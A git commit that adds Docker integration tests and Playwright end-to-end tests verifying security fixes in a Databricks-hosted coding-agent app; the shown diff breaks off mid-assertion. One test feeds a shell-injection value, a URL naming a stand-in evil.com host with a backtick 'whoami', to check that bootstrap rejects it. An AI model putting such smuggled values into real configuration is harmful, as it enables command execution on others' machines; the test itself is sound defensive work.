Layer 2 — Playwright e2e against live deployed app (tests/e2e/)
================================================================

What it does: drives a real CoDA deployment (default profile: daveok)
via Playwright. Reuses stored SSO state to skip the Microsoft Entra
flow on each run, mints a fresh PAT, fills the PAT prompt, waits for
'Ready', then runs verify.sh inside the live terminal session via
/api/input + DOM scrape (same pattern the chrome-devtools MCP session
used by hand). Parses [PASS]/[FAIL] markers and asserts the exit code.

Files:
- conftest.py — fixtures for app URL resolution, PAT minting,
  storage_state injection. Skips the whole module if auth.json isn't
  recorded or the Databricks CLI isn't authed.
- test_live_security.py — drives the live flow end-to-end.
- README.md — one-time setup walkthrough (e2e-auth + browser install).
- auth.json is gitignored (contains workspace cookies).

Wall time: ~1-2 min per test. LLM tokens per run: zero.

Makefile additions
==================

- `make test` — unit tests only (~3 min). Excludes integration + e2e.
- `make integration-test` — Docker-based pytest (3-5 min).
- `make e2e-test PROFILE=daveok` — Playwright against live app.
- `make e2e-auth PROFILE=daveok` — one-time SSO session recording.

Dev deps
========

Added a [dependency-groups] dev table with playwright + pytest-playwright
+ pytest-timeout. Install with `uv sync --group dev`. Tests skip cleanly
when not installed — `playwright` is only required for the e2e suite.

Test results
============

348/349 pass for `make test`. The one failure is
TestNpmVersionLive::test_resolves_real_package — a pre-existing
network-dependent flake unrelated to this change. Docker image builds
cleanly. Pytest collects all 3 integration tests + the e2e test.

Token math
==========

Authoring this took LLM tokens (one-time cost). Every subsequent run
of `make integration-test` or `make e2e-test` is zero LLM tokens —
the tests run themselves in CI.

Co-authored-by: Isaac
---
 .gitignore                               |   8 +
 Makefile                                 |  23 ++-
 pyproject.toml                           |  13 ++
 tests/e2e/README.md                      |  78 +++++++++
 tests/e2e/__init__.py                    |   0
 tests/e2e/conftest.py                    | 124 +++++++++++++
 tests/e2e/test_live_security.py          | 140 +++++++++++++++
 tests/integration/Dockerfile.apps-like   |  47 +++++
 tests/integration/__init__.py            |   0
 tests/integration/run_pipeline.sh        | 114 ++++++++++++
 tests/integration/test_setup_pipeline.py | 210 +++++++++++++++++++++++
 tests/integration/verify.sh              | 143 +++++++++++++++
 12 files changed, 897 insertions(+), 3 deletions(-)
 create mode 100644 tests/e2e/README.md
 create mode 100644 tests/e2e/__init__.py
 create mode 100644 tests/e2e/conftest.py
 create mode 100644 tests/e2e/test_live_security.py
 create mode 100644 tests/integration/Dockerfile.apps-like
 create mode 100644 tests/integration/__init__.py
 create mode 100755 tests/integration/run_pipeline.sh
 create mode 100644 tests/integration/test_setup_pipeline.py
 create mode 100755 tests/integration/verify.sh

diff --git a/.gitignore b/.gitignore
index 7b09b54..7f87a19 100644
--- a/.gitignore
+++ b/.gitignore
@@ -42,3 +42,11 @@ uv.lock
 
 # Agent-plane reference clone
 agent-plane-ref/
+
+# Playwright e2e SSO session state (workspace cookies — DO NOT commit)
+tests/e2e/auth.json
+tests/e2e/.cache/
+
+# Playwright browser snapshots / traces from failed runs
+tests/e2e/test-results/
+tests/e2e/playwright-report/
diff --git a/Makefile b/Makefile
index 16030c0..909340a 100644
--- a/Makefile
+++ b/Makefile
@@ -22,12 +22,29 @@ APP_NAME      ?= coding-agents
 USER_EMAIL    = $(shell databricks current-user me --profile $(PROFILE) --output json 2>/dev/null | python3 -c "import sys,json; print(json.load(sys.stdin).get('userName',''))")
 WORKSPACE_PATH = /Workspace/Users/$(USER_EMAIL)/apps/$(APP_NAME)
 
-.PHONY: help test deploy redeploy create-app create-pat sync deploy-app status open clean enterprise-doctor
+.PHONY: help test integration-test e2e-test e2e-auth deploy redeploy create-app create-pat sync deploy-app status open clean enterprise-doctor
 
 # ── Help ─────────────────────────────────────────────
 
-test: ## Run unit tests
-	uv run pytest tests/ -v
+test: ## Run unit tests (fast — excludes Docker integration + Playwright e2e)
+	uv run pytest tests/ -v --ignore=tests/integration --ignore=tests/e2e
+
+integration-test: ## Run Docker-based pipeline integration test (~3-5 min wall time)
+	uv run pytest tests/integration/ -v -s
+
+e2e-test: ## Run Playwright e2e against live deployed app (needs `make e2e-auth` first)
+	uv run pytest tests/e2e/ -v -s
+
+e2e-auth: ## Record SSO session for e2e tests (one-time per cookie expiry)
+	@# Resolve the app URL via the configured profile, then launch a headed
+	@# Chromium that saves storage state to tests/e2e/auth.json.
+	@url=$$(databricks apps get coding-agents --profile $(PROFILE) --output json 2>/dev/null \
+		| python3 -c "import sys,json; print(json.load(sys.stdin)['url'])") && \
+	echo "Recording SSO session against $$url ..." && \
+	uv run playwright codegen --save-storage tests/e2e/auth.json "$$url"
+	@echo ""
+	@echo "Auth state saved to tests/e2e/auth.json (gitignored)."
+	@echo "Run `make e2e-test PROFILE=$(PROFILE)` to execute the suite."
 
 help: ## Show this help
 	@grep -E '^[a-zA-Z0-9_-]+:.*?## .*$$' $(MAKEFILE_LIST) | awk 'BEGIN {FS = ":.*?## "}; {printf "  \033[36m%-18s\033[0m %s\n", $$1, $$2}'
diff --git a/pyproject.toml b/pyproject.toml
index c8c912a..ada7c97 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -23,6 +23,19 @@ dependencies = [
     "importlib-metadata<8.8",
 ]
 
+[dependency-groups]
+# Dev/test-only deps — not shipped to the app container. Install with
+# `uv sync --group dev` or `uv pip install --group dev`.
+dev = [
+    "pytest>=8.0",
+    "pytest-timeout>=2.4",
+    # Playwright for the e2e suite (tests/e2e/) — drives a real browser
+    # against the deployed app to verify SSO + setup pipeline + security
+    # fixes end-to-end. Optional: tests skip cleanly when not installed.
+    "playwright>=1.40",
+    "pytest-playwright>=0.5",
+]
+
 [tool.uv]
 # Exclude packages uploaded to PyPI more recently than ~30 days ago.
 # This gives the community time to catch supply-chain issues before they land here.
diff --git a/tests/e2e/README.md b/tests/e2e/README.md
new file mode 100644
index 0000000..dbec9c9
--- /dev/null
+++ b/tests/e2e/README.md
@@ -0,0 +1,78 @@
+# End-to-end tests against a live CoDA deployment
+
+These tests drive a real deployed CoDA app via Playwright. They exist
+because the Docker integration tests can't replicate the Databricks Apps
+SSO flow or PAT-rotator behaviour.
+
+## What gets tested
+
+- F-01 — terminal env credential strip (live PTY)
+- F-04 — DEEPWIKI/EXA MCP wiring in `~/.claude.json` and `~/.hermes/config.yaml`
+- F-05 — `~/.hermes/config.yaml` chmod 0o600
+- F-06 — Hermes installed (SHA-pinned source resolved + `uv tool install` ran)
+- Cooldown — npm CLIs are stable versions, not pre-releases
+
+## One-time setup
+
+### 1. Install Playwright + browser
+
+```
+uv sync --group dev
+uv run playwright install chromium
+```
+
+### 2. Record your Databricks SSO session
+
+```
+make e2e-auth PROFILE=daveok
+```
+
+That launches a headed Chromium window pointed at the CoDA app URL.
+Complete the Databricks Apps SSO login in the browser (Microsoft Entra
+or whatever your workspace uses). Once you land on the CoDA terminal
+page, close the window — Playwright will save the session cookies to
+`tests/e2e/auth.json`.
+
+The recorded `auth.json` contains workspace cookies. It's gitignored.
+If you commit it by accident, revoke the cookies via your Databricks
+account settings.
+
+### 3. Make sure the Databricks CLI is authed
+
+```
+databricks current-user me --profile daveok
+```
+
+The fixtures use the CLI to mint a fresh PAT for each test run.
+
+## Running the tests
+
+```
+make e2e-test PROFILE=daveok
+# or directly:
+uv run pytest tests/e2e/test_live_security.py -v
+```
+
+Wall time: ~2 min per test (PAT mint + container setup + verify).
+LLM tokens per run: zero — Playwright drives the browser autonomously.
+
+## Re-recording auth
+
+Auth cookies expire (Databricks' default is hours, sometimes days). When
+the e2e tests start failing with "could not find PAT prompt" or similar,
+re-run `make e2e-auth` to refresh `auth.json`.
+
+## What if Playwright isn't installed
+
+The whole module skips cleanly via `pytest.importorskip("playwright.sync_api")`.
+The unit + Docker integration tests don't depend on Playwright.
+
+## Why not just run Selenium / Cypress / chrome-devtools MCP?
+
+- **Selenium / Cypress** would work — Playwright was picked because it's
+  the most reliable + fastest for SSO flows (built-in storage_state, no
+  flaky driver setup) and has first-class Python bindings.
+- **chrome-devtools MCP** is what we used during the security review
+  itself — it's interactive and great for one-off exploration, but every
+  step spends LLM tokens. Playwright is the codified version that runs
+  without an LLM in the loop.
diff --git a/tests/e2e/__init__.py b/tests/e2e/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/tests/e2e/conftest.py b/tests/e2e/conftest.py
new file mode 100644
index 0000000..908cab6
--- /dev/null
+++ b/tests/e2e/conftest.py
@@ -0,0 +1,124 @@
+"""Playwright e2e fixtures for the live CoDA app.
+
+Tests in this directory drive a real deployed CoDA instance — they exist
+because Docker can't replicate the Databricks Apps SSO + PAT-rotator
+flow. Each test:
+
+1. Loads pre-recorded SSO auth state (`auth.json`) so the browser starts
+   already logged in to Databricks. See README for how to record it.
+2. Mints a fresh PAT via the Databricks CLI.
+3. Drives the app via Playwright + the same /api/input + DOM-scrape
+   pattern the chrome-devtools MCP session used.
+
+Token cost per run: zero LLM tokens. Wall time: ~1-2 min per test.
+"""
+
+from __future__ import annotations
+
+import os
+import subprocess
+from pathlib import Path
+
+import pytest
+
+REPO_ROOT = Path(__file__).resolve().parent.parent.parent
+AUTH_STATE = Path(__file__).parent / "auth.json"
+
+
+def _databricks_profile() -> str:
+    return os.environ.get("DATABRICKS_PROFILE", "daveok")
+
+
+def _app_url() -> str:
+    """Resolve the CoDA app URL for the configured profile.
+
+    Reads `databricks apps get coding-agents --profile <profile>` so the
+    test doesn't have to hardcode workspace URLs.
+    """
+    override = os.environ.get("CODA_APP_URL", "").strip()
+    if override:
+        return override
+    result = subprocess.run(
+        [
+            "databricks", "apps", "get", "coding-agents",
+            "--profile", _databricks_profile(), "--output", "json",
+        ],
+        capture_output=True, text=True, timeout=10,
+    )
+    if result.returncode != 0:
+        pytest.skip(
+            f"Cannot resolve app URL (databricks apps get failed): "
+            f"{result.stderr.strip()}"
+        )
+    import json
+    return json.loads(result.stdout)["url"]
+
+
+def _mint_pat() -> str:
+    """Mint a short-lived PAT via the Databricks CLI for the test session."""
+    result = subprocess.run(
+        [
+            "databricks", "tokens", "create",
+            "--lifetime-seconds", "3600",   # 1h — comfortably covers the test
+            "--comment", "coda-e2e-test",
+            "--profile", _databricks_profile(),
+            "--output", "json",
+        ],
+        capture_output=True, text=True, timeout=15,
+    )
+    if result.returncode != 0:
+        pytest.skip(
+            f"Cannot mint PAT (databricks tokens create failed): "
+            f"{result.stderr.strip()}"
+        )
+    import json
+    return json.loads(result.stdout)["token_value"]
+
+
+# ---------------------------------------------------------------------------
+# Fixtures
+# ---------------------------------------------------------------------------
+
+
+def pytest_collection_modifyitems(config, items):
+    """Skip the whole e2e suite if prerequisites aren't met."""
+    skips = []
+    if not AUTH_STATE.exists():
+        skips.append(
+            f"missing {AUTH_STATE.relative_to(REPO_ROOT)} — "
+            f"run `make e2e-auth` first to record SSO session"
+        )
+    if subprocess.run(
+        ["databricks", "current-user", "me", "--profile", _databricks_profile()],
+        capture_output=True, timeout=10,
+    ).returncode != 0:
+        skips.append(
+            f"databricks CLI not authed for profile {_databricks_profile()!r} — "
+            f"run `databricks auth login --profile {_databricks_profile()}`"
+        )
+    if skips:
+        skip_marker = pytest.mark.skip(reason=" | ".join(skips))
+        for item in items:
+            item.add_marker(skip_marker)
+
+
+@pytest.fixture(scope="module")
+def app_url() -> str:
+    return _app_url()
+
+
+@pytest.fixture(scope="module")
+def auth_state_path() -> str:
+    return str(AUTH_STATE)
+
+
+@pytest.fixture
+def fresh_pat() -> str:
+    """A freshly-minted 1h PAT. New token per test to avoid cross-test bleed."""
+    return _mint_pat()
+
+
+@pytest.fixture(scope="session")
+def browser_context_args(browser_context_args):
+    """Inject the recorded SSO storage state into every Playwright context."""
+    return {**browser_context_args, "storage_state": str(AUTH_STATE)}
diff --git a/tests/e2e/test_live_security.py b/tests/e2e/test_live_security.py
new file mode 100644
index 0000000..2095970
--- /dev/null
+++ b/tests/e2e/test_live_security.py
@@ -0,0 +1,140 @@
+"""End-to-end security-fix verification against a live deployed CoDA app.
+
+This is the codified version of the chrome-devtools MCP-driven session
+that verified the F-01/F-04/F-05/F-06 fixes on daveok. It replaces the
+manual "open browser, paste PAT, run commands" loop with a Playwright
+test that runs autonomously.
+
+Prerequisites (one-time setup):
+  1. `make e2e-auth` — records your Databricks SSO session to auth.json.
+  2. Databricks CLI authed for the target profile (default: daveok).
+
+To run: `make e2e-test PROFILE=daveok` or
+        `uv run pytest tests/e2e/test_live_security.py`
+
+Wall time per run: ~2 min (PAT + setup + verify).
+LLM tokens per run: zero.
+"""
+
+from __future__ import annotations
+
+import time
+
+import pytest
+
+# Skip the entire module cleanly if Playwright isn't installed.
+playwright = pytest.importorskip("playwright.sync_api")
+
+
+def _send_input(page, sid: str, cmd: str) -> None:
+    """POST a command + trailing newline to the app's /api/input endpoint."""
+    page.evaluate(
+        """async ({sid, cmd}) => {
+            await fetch('/api/input', {
+                method: 'POST',
+                credentials: 'include',
+                headers: {'Content-Type': 'application/json'},
+                body: JSON.stringify({session_id: sid, input: cmd + '\\n'}),
+            });
+        }""",
+        {"sid": sid, "cmd": cmd},
+    )
+
+
+def _xterm_text(page) -> str:
+    """Concatenate the currently-rendered xterm rows into one string."""
+    return page.evaluate(
+        """() => {
+            const rows = document.querySelectorAll('.xterm-rows > div');
+            return Array.from(rows).map(r => r.textContent || '').join('\\n');
+        }"""
+    )
+
+
+def _read_session_id(page) -> str:
+    """Find the active terminal session id via the app's own /api/sessions."""
+    info = page.evaluate(
+        """async () => {
+            const r = await fetch('/api/sessions', {credentials: 'include'});
+            return r.json();
+        }"""
+    )
+    return info["sessions"][0]["session_id"]
+
+
+def test_live_app_security_fixes(page, app_url, fresh_pat):
+    """Drive the live CoDA app and assert the security-fixes verify script passes.
+
+    Steps:
+      1. Load the app (SSO state already in the browser context via conftest).
+      2. Wait for the PAT prompt.
+      3. Fill the PAT into the xterm input.
+      4. Wait for "Ready" (setup pipeline complete).
+      5. Run the verify.sh assertions via /api/input.
+      6. Scrape the xterm DOM and assert no [FAIL] markers.
+    """
+    page.goto(app_url, timeout=30_000)
+    # The PAT prompt arrives via the terminal output, not as a normal DOM
+    # element. Wait for the trailing "Token:" prompt to appear in xterm.
+    page.wait_for_function(
+        """() => document.body.innerText.includes('Token:')""",
+        timeout=60_000,
+    )
+
+    # Paste the fresh PAT into the xterm input. xterm.js routes keyboard
+    # events through a hidden textarea labelled "Terminal input".
+    terminal_input = page.get_by_role("textbox", name="Terminal input")
+    terminal_input.fill(fresh_pat + "\n")
+
+    # The "Ready" banner appears once setup completes (~60-90s on a fresh
+    # container). Time out generously.
+    page.wait_for_function(
+        """() => document.body.innerText.includes('Ready')""",
+        timeout=180_000,
+    )
+
+    # Get the active session id, then send the verify.sh assertions.
+    sid = _read_session_id(page)
+
+    # We run verify.sh from the repo path that's synced to the workspace.
+    # The Databricks Apps env mounts the source at /app/python/source_code.
+    verify_path = "/app/python/source_code/tests/integration/verify.sh"
+    _send_input(page, sid, f'bash {verify_path}; echo "VERIFY-EXIT-CODE=$?"')
+
+    # Poll xterm for the EXIT-CODE marker (verify.sh runs in ~5s).
+    deadline = time.time() + 60
+    output = ""
+    while time.time() < deadline:
+        output = _xterm_text(page)
+        if "VERIFY-EXIT-CODE=" in output:
+            break
+        time.sleep(1)
+    assert "VERIFY-EXIT-CODE=" in output, (
+        f"verify.sh never reported an exit code. xterm contents:\n{output[-3000:]}"
+    )
+
+    # Extract the exit code line and the [FAIL] markers
+    import re
+    exit_match = re.search(r"VERIFY-EXIT-CODE=(\d+)", output)
+    exit_code = int(exit_match.group(1)) if exit_match else -1
+
+    fail_lines = [line for line in output.splitlines() if "[FAIL]" in line]
+    pass_lines = [line for line in output.splitlines() if "[PASS]" in line]
+
+    # Print full output for CI logs
+    print("\n=== verify.sh output (last 60 lines) ===")
+    for line in output.splitlines()[-60:]:
+        print(line)
+    print(f"\nVERIFY-EXIT-CODE = {exit_code}")
+    print(f"PASS count: {len(pass_lines)}")
+    print(f"FAIL count: {len(fail_lines)}")
+
+    assert exit_code == 0, (
+        f"verify.sh exited non-zero ({exit_code}). Failures:\n"
+        + "\n".join(fail_lines)
+    )
+    assert not fail_lines, f"verify.sh emitted [FAIL] lines:\n" + "\n".join(fail_lines)
+    # And explicitly check the critical fixes are observable
+    must_pass = ["F-01", "F-05", "F-06", "cooldown opencode", "cooldown codex", "cooldown gemini"]
+    missing = [m for m in must_pass if not any(m in p for p in pass_lines)]
+    assert not missing, f"Expected [PASS] markers missing: {missing}"
diff --git a/tests/integration/Dockerfile.apps-like b/tests/integration/Dockerfile.apps-like
new file mode 100644
index 0000000..08c33ab
--- /dev/null
+++ b/tests/integration/Dockerfile.apps-like
@@ -0,0 +1,47 @@
+# Apps-like Docker image for CoDA integration tests.
+#
+# Approximates the Databricks Apps runtime (Ubuntu 22.04, unprivileged user,
+# uv-managed Python, system node/npm) closely enough that running our
+# setup_*.py + install_*.sh pipeline inside this container exercises the
+# same security-relevant paths as a real Apps deployment.
+#
+# What this image is NOT:
+#   - It's not the actual Databricks Apps base image (which is internal).
+#   - It does not bootstrap a Service Principal (we don't need to — the app
+#     strips those creds immediately at startup; tests run as a regular user).
+#   - It does not start gunicorn or the Flask app (we're testing the SETUP
+#     PIPELINE, not the running server).
+#
+# To rebuild: `docker build -f tests/integration/Dockerfile.apps-like -t coda-apps-test .`
+
+FROM ubuntu:22.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+# Base system: matches Databricks Apps' Ubuntu 22.04 + tools the setup
+# pipeline expects (python3, node/npm, git, curl, unzip).
+RUN apt-get update && apt-get install -y --no-install-recommends \
+        ca-certificates curl git unzip \
+        python3 python3-pip python3-venv \
+        nodejs npm \
+        build-essential \
+    && rm -rf /var/lib/apt/lists/*
+
+# uv — installed system-wide so the unprivileged user can use it.
+RUN curl -fsSL https://astral.sh/uv/install.sh | env UV_UNMANAGED_INSTALL=/usr/local/bin sh && \
+    chmod +x /usr/local/bin/uv
+
+# Create the unprivileged 'app' user with a similar layout to Databricks
+# Apps' "app" user. Databricks Apps uses HOME=/app/python/source_code; we
+# use /home/app here for portability. The setup scripts handle either.
+RUN useradd -m -u 1001 -s /bin/bash app && \
+    mkdir -p /home/app/.local/bin && \
+    chown -R app:app /home/app
+
+USER app
+WORKDIR /work
+ENV HOME=/home/app
+ENV PATH=/home/app/.local/bin:/usr/local/bin:/usr/bin:/bin
+
+# The test driver mounts the repo at /work and runs the pipeline directly.
+# No CMD/ENTRYPOINT — let the driver script orchestrate.
diff --git a/tests/integration/__init__.py b/tests/integration/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/tests/integration/run_pipeline.sh b/tests/integration/run_pipeline.sh
new file mode 100755
index 0000000..7b9f05c
--- /dev/null
+++ b/tests/integration/run_pipeline.sh
@@ -0,0 +1,114 @@
+#!/usr/bin/env bash
+# Run the CoDA setup pipeline inside the apps-like container, then verify.
+#
+# Invoked by `tests/integration/test_setup_pipeline.py` after the container
+# is started and the repo is mounted at /work. We don't shell into the
+# container interactively — we just run this script as the entry command.
+#
+# Mirrors the order app.py:run_setup() uses on the live app: install_*.sh
+# sequentially, then setup_*.py in series (we skip parallelism here for
+# log readability). Skips setup_proxy.py (the localhost content-filter
+# proxy isn't relevant for the security-fix checks) and setup_mlflow.py
+# (MLflow tracing isn't part of the security-fix scope).
+
+set -eo pipefail
+
+# The repo is mounted read-only at /repo. Copy to a writable /work for uv
+# venv + setup-script side effects. Excludes .venv (huge) and .git.
+echo "============================================================"
+echo "CoDA apps-like integration test — pipeline + verify"
+echo "============================================================"
+echo "HOME=$HOME"
+echo "USER=$(id -u -n)"
+echo "PATH=$PATH"
+echo
+
+mkdir -p /work
+cd /repo && cp -a --no-preserve=ownership \
+    requirements.txt pyproject.toml app.py utils.py app_state.py \
+    pat_rotator.py telemetry.py cli_auth.py enterprise_config.py \
+    install_micro.sh install_gh.sh install_databricks_cli.sh \
+    setup_proxy.py setup_claude.py setup_codex.py setup_gemini.py \
+    setup_opencode.py setup_hermes.py setup_databricks.py setup_mlflow.py \
+    content_filter_proxy.py CLAUDE.md \
+    /work/ 2>/dev/null || true
+# Also need the tests dir for verify.sh
+mkdir -p /work/tests/integration
+cp /repo/tests/integration/verify.sh /work/tests/integration/
+# And the agents/skills directories that setup_claude.py references
+[ -d /repo/agents ] && cp -a --no-preserve=ownership /repo/agents /work/ || true
+[ -d /repo/.claude ] && cp -a --no-preserve=ownership /repo/.claude /work/ || true
+cd /work
+
+# Stage 1: synced uv venv (mirrors what `databricks apps deploy` does at build)
+echo ">>> Stage 1: uv sync (pyproject.toml)"
+uv venv .venv
+uv pip install -r requirements.txt
+. .venv/bin/activate
+echo
+
+# Stage 2: install_*.sh — three GitHub-release downloaders
+echo ">>> Stage 2: install_micro.sh"
+bash install_micro.sh && mv micro $HOME/.local/bin/ 2>/dev/null || true
+echo ">>> Stage 2: install_gh.sh"
+bash install_gh.sh
+echo ">>> Stage 2: install_databricks_cli.sh"
+bash install_databricks_cli.sh
+echo
+
+# Stage 3: setup_*.py — agent CLI installs.
+# Use fake creds — Codex/Gemini/OpenCode/Hermes install regardless of
+# token (it's only the config-write step that needs auth).
+export DATABRICKS_HOST="https://fake.databricks.com"
+export DATABRICKS_TOKEN="dapifake0000000000000000000000000000"
+export ANTHROPIC_MODEL="databricks-claude-opus-4-7"
+export GEMINI_MODEL="databricks-gemini-2-5-pro"
+export CODEX_MODEL="databricks-gpt-5-5"
+export HERMES_MODEL="databricks-claude-opus-4-6"
+export HERMES_FALLBACK_MODEL="databricks-claude-opus-4-6"
+export ENABLE_HERMES="true"
+
+# enterprise_config.bootstrap() runs from app.py at startup; in tests we
+# invoke it directly so its side effects (npmrc write, env var push,
+# URL validation) happen before any setup script tries to install.
+echo ">>> Stage 3a: enterprise_config.bootstrap()"
+# Don't kill the pipeline if bootstrap raises (e.g. UnsafeUrlError under the
+# malicious-mirror test) — we want the error message to surface in stdout
+# for the test driver to assert on.
+python3 -c "import enterprise_config; enterprise_config.bootstrap()" || \
+    echo "(bootstrap raised — see above)"
+
+echo ">>> Stage 3b: setup_claude.py"
+uv run python setup_claude.py || echo "(setup_claude.py exited non-zero — checking what landed anyway)"
+
+echo ">>> Stage 3c: setup_codex.py"
+uv run python setup_codex.py || echo "(setup_codex.py exited non-zero)"
+
+echo ">>> Stage 3d: setup_gemini.py"
+uv run python setup_gemini.py || echo "(setup_gemini.py exited non-zero)"
+
+echo ">>> Stage 3e: setup_opencode.py"
+uv run python setup_opencode.py || echo "(setup_opencode.py exited non-zero)"
+
+echo ">>> Stage 3f: setup_hermes.py"
+uv run python setup_hermes.py || echo "(setup_hermes.py exited non-zero)"
+
+echo
+
+# Stage 4: simulate the terminal-env strip that create_session() applies.
+# We can't exec verify.sh under the real PTY env (no Flask app running),
+# so we approximate by running verify.sh under the env that
+# _build_terminal_shell_env() would produce. This exercises F-01 exactly
+# the way a user terminal would experience it.
+echo ">>> Stage 4: verify.sh (under simulated terminal env)"
+cd /work
+python3 - <<'PYEOF'
+import os, subprocess, sys
+sys.path.insert(0, '/work')
+from app import _build_terminal_shell_env
+env = _build_terminal_shell_env(os.environ)
+sys.exit(subprocess.call(
+    ["bash", "/work/tests/integration/verify.sh"],
+    env=env,
+))
+PYEOF
diff --git a/tests/integration/test_setup_pipeline.py b/tests/integration/test_setup_pipeline.py
new file mode 100644
index 0000000..455b920
--- /dev/null
+++ b/tests/integration/test_setup_pipeline.py
@@ -0,0 +1,210 @@
+"""Integration test: run the full CoDA setup pipeline in an apps-like Docker
+container, then assert on the resulting filesystem + env state.
+
+This is the codified version of the manual chrome-devtools verification —
+it replaces "log in, paste PAT, open terminal, run commands, screenshot"
+with a single `make integration-test` that builds a representative
+container, runs the pipeline inside, and parses verify.sh output.
+
+Token cost per run: zero. Wall time: ~3-5 minutes (npm + uv installs).
+
+Skipped automatically if Docker isn't installed — locally and in CI both.
+"""
+
+from __future__ import annotations
+
+import shutil
+import subprocess
+from pathlib import Path
+
+import pytest
+
+REPO_ROOT = Path(__file__).resolve().parent.parent.parent
+IMAGE_TAG = "coda-apps-test:latest"
+DOCKERFILE = REPO_ROOT / "tests" / "integration" / "Dockerfile.apps-like"
+PIPELINE_SCRIPT = "/repo/tests/integration/run_pipeline.sh"
+
+
+def _docker_available() -> bool:
+    """True iff Docker CLI exists AND the daemon responds."""
+    if not shutil.which("docker"):
+        return False
+    try:
+        subprocess.run(
+            ["docker", "info"],
+            capture_output=True, timeout=5, check=True,
+        )
+        return True
+    except (subprocess.CalledProcessError, subprocess.TimeoutExpired):
+        return False
+
+
+pytestmark = pytest.mark.skipif(
+    not _docker_available(),
+    reason="Docker daemon not available — integration test requires docker",
+)
+
+
+@pytest.fixture(scope="module")
+def apps_like_image():
+    """Build the apps-like image once per test session.
+
+    Docker layer cache makes subsequent builds nearly free; the first build
+    on a fresh machine takes ~2 minutes (apt + uv install).
+    """
+    build = subprocess.run(
+        [
+            "docker", "build",
+            "-f", str(DOCKERFILE),
+            "-t", IMAGE_TAG,
+            str(REPO_ROOT / "tests" / "integration"),  # context = the integration dir
+        ],
+        capture_output=True, text=True,
+    )
+    if build.returncode != 0:
+        pytest.fail(
+            f"docker build failed (rc={build.returncode}):\n"
+            f"--- stdout ---\n{build.stdout[-1500:]}\n"
+            f"--- stderr ---\n{build.stderr[-1500:]}"
+        )
+    return IMAGE_TAG
+
+
+def _run_pipeline(image: str, extra_env: dict[str, str] | None = None) -> subprocess.CompletedProcess:
+    """Run the pipeline script inside a fresh container with the repo mounted."""
+    env_args: list[str] = []
+    for k, v in (extra_env or {}).items():
+        env_args.extend(["-e", f"{k}={v}"])
+    return subprocess.run(
+        [
+            "docker", "run", "--rm",
+            "-v", f"{REPO_ROOT}:/repo:ro",  # repo read-only at /repo; pipeline copies to writable /work
+            *env_args,
+            image,
+            "bash", PIPELINE_SCRIPT,
+        ],
+        capture_output=True, text=True,
+        timeout=600,  # 10 min ceiling — npm + uv installs can be slow on first run
+    )
+
+
+# ---------------------------------------------------------------------------
+# Main happy-path test
+# ---------------------------------------------------------------------------
+
+
+def test_pipeline_runs_and_security_fixes_hold(apps_like_image):
+    """Full pipeline run in a non-enterprise (default) configuration.
+
+    Asserts every [PASS] line we expect appears, and no [FAIL] lines appear.
+    This is the "did anything regress" check — covers F-01 / F-04 / F-05 /
+    F-06 / cooldown in one go.
+    """
+    result = _run_pipeline(apps_like_image)
+
+    # Print captured output unconditionally so CI logs show the pipeline
+    # transcript regardless of pass/fail.
+    print("\n=== Pipeline stdout ===")
+    print(result.stdout)
+    print("\n=== Pipeline stderr ===")
+    print(result.stderr)
+
+    # The pipeline script exits with verify.sh's exit code. Non-zero means
+    # at least one assertion failed in verify.sh.
+    if result.returncode != 0:
+        pytest.fail(
+            f"Pipeline+verify exited with rc={result.returncode}. "
+            f"See output above for the [FAIL] lines."
+        )
+
+    # Belt-and-braces: explicitly check for each expected PASS marker so
+    # we catch the case where verify.sh exits 0 but some checks were
+    # silently skipped.
+    expected_passes = [
+        "F-01 terminal env has no leaked credentials",
+        "F-04 Claude MCP wiring",
+        "F-05 Hermes config",          # either chmod 0o600 OR skipped — both acceptable
+        "F-06 Hermes installed",
+        "cooldown opencode stable",
+        "cooldown codex stable",
+        "cooldown gemini stable",
+    ]
+    missing = [m for m in expected_passes if m not in result.stdout]
+    assert not missing, (
+        f"verify.sh did not emit expected [PASS] markers: {missing}. "
+        f"Output:\n{result.stdout[-3000:]}"
+    )
+
+    # And NO [FAIL] lines anywhere
+    assert "[FAIL]" not in result.stdout, (
+        f"verify.sh emitted [FAIL] lines:\n{result.stdout}"
+    )
+
+
+# ---------------------------------------------------------------------------
+# Enterprise-mode happy path: MCP overrides actually omit servers
+# ---------------------------------------------------------------------------
+
+
+def test_mcp_overrides_omit_servers_when_empty(apps_like_image):
+    """When DEEPWIKI_MCP_URL=`` and EXA_MCP_URL=``, the resulting
+    ~/.claude.json should have NO mcpServers entries.
+
+    This is the F-04 "documented security control actually works" check
+    that the first independent review caught — without this test, a
+    regression in setup_claude.py / setup_opencode.py / setup_hermes.py
+    that re-hardcodes the URLs would go undetected.
+    """
+    result = _run_pipeline(
+        apps_like_image,
+        extra_env={"DEEPWIKI_MCP_URL": "", "EXA_MCP_URL": ""},
+    )
+
+    print("\n=== Pipeline stdout (enterprise MCP-override mode) ===")
+    print(result.stdout[-3000:])
+
+    if result.returncode != 0:
+        pytest.fail(
+            f"Pipeline failed in MCP-override mode (rc={result.returncode}). "
+            f"See output above."
+        )
+
+    # The relevant verify.sh line should report MCP servers were omitted
+    assert (
+        "F-04 Claude MCP servers omitted when overrides empty" in result.stdout
+    ), (
+        f"Expected the empty-override branch of F-04 to pass. "
+        f"Got:\n{result.stdout[-1500:]}"
+    )
+
+
+# ---------------------------------------------------------------------------
+# Defense in depth: validate_mirror_env() rejects shell-injection URLs
+# ---------------------------------------------------------------------------
+
+
+def test_unsafe_mirror_url_rejected_at_bootstrap(apps_like_image):
+    """If an operator sets GITHUB_API_BASE to a value containing shell
+    metacharacters, bootstrap() should refuse to proceed.
+
+    Mirrors the F-03 unit test, but exercises it from the actual entry
+    point that runs at container startup.
+    """
+    result = _run_pipeline(
+        apps_like_image,
+        extra_env={"GITHUB_API_BASE": "https://evil.com/`whoami`"},
+    )
+
+    print("\n=== Pipeline stdout (malicious mirror env) ===")
+    print(result.stdout[-2000:])
+    print("\n=== Pipeline stderr ===")
+    print(result.stderr[-2000:])
+
+    # The bootstrap call in run_pipeline.sh should raise UnsafeUrlError.
+    # The pipeline script may continue past that (uv run python -c doesn't
+    # halt on a raised exception unless set -e catches it), so we just
+    # check that the rejection happened.
+    combined = result.stdout + result.stderr
+    assert "UnsafeUrlError" in combined or "GITHUB_API_BASE" in combined, (
